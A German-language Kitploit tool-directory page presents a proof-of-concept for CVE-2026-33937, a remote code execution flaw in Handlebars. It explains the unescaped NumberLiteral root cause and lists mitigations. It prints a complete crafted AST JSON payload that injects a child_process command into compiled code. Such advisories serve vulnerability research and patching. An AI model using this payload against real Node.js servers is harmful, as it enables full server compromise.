Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-33937 — Proof-of-Concept-Exploit für CVE-2026-33937, eine Handlebars-AST-Injection-Schwachstelle, die zu Remote-Code-Ausführung in Node.js führt. Demonstriert manipulierte AST-Payloads und bietet Anleitungen zur Schadensbegrenzung. | Kitploit
Tools/GitHubGitHub/dinhvaren/cve-2026-33937
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPayload-Entwicklung
GitHubdinhvaren/cve-2026-33937

cve-2026-33937

Proof-of-Concept-Exploit für CVE-2026-33937, eine Handlebars-AST-Injection-Schwachstelle, die zu Remote-Code-Ausführung in Node.js führt. Demonstriert manipulierte AST-Payloads und bietet Anleitungen zur Schadensbegrenzung.

Repository anzeigen
4vor 4 MonatenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33937 - Handlebars RCE Exploit PoC

Beschreibung

CVE-2026-33937 ist eine kritische Remote-Code-Execution-Schwachstelle (RCE) in Handlebars, die durch unsichere Verarbeitung von Abstract-Syntax-Tree-Eingaben (AST) verursacht wird.

Die Schwachstelle ermöglicht es Angreifern, beliebigen JavaScript-Code einzuschleusen, indem sie ein manipuliertes AST-Objekt an Handlebars.compile() übergeben.

Ursache

Handlebars.compile() akzeptiert beides:

  • Template-String
  • Vorgeparstes AST-Objekt

Wenn ein AST-Objekt bereitgestellt wird, wird die Parsing-Phase übersprungen.

Innerhalb:

root@kitploit:~

lib/handlebars/compiler/javascript-compiler.js

Die Funktion:

root@kitploit:~
NumberLiteral(number) {
  this.pushStackLiteral(number.value);
}

fügt number.value direkt in generierten JavaScript-Code ein, , was zu Code-Injection führt.

ohne Bereinigung oder Escaping

Auswirkungen

  • Remote Code Execution (RCE)
  • Vollständige Server-Kompromittierung
  • Beliebige JavaScript-Ausführung in der Node.js-Umgebung

Exploit-Ablauf

root@kitploit:~
Angreifer → Manipuliertes AST (JSON)
        │
        ▼
Handlebars.compile()
        │
        ▼
Compiler.compile()
        │
        ▼
JavaScriptCompiler (NumberLiteral-Injection)
        │
        ▼
Code-Generierung
        │
        ▼
new Function(...) / eval()
        │
        ▼
       RCE

Proof of Concept (PoC)

root@kitploit:~
{
  "type": "Program",
  "body": [
    {
      "type": "MustacheStatement",
      "path": {
        "type": "PathExpression",
        "data": false,
        "depth": 0,
        "parts": ["lookup"],
        "original": "lookup",
        "loc": null
      },
      "params": [
        {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": [],
          "original": "this",
          "loc": null
        },
        {
          "type": "NumberLiteral",
          "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
          "original": 1,
          "loc": null
        }
      ],
      "escaped": true,
      "strip": { "open": false, "close": false },
      "loc": null
    }
  ],
  "strip": {},
  "loc": null
}

Betroffene Versionen

  • Handlebars <= 4.7.8

Gegenmaßnahmen

  • Keine nicht vertrauenswürdigen AST-Eingaben zulassen
  • Alle Template-Eingaben validieren und bereinigen
  • Upgrade auf eine gepatchte Version von Handlebars

Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33937
Tool herunterladen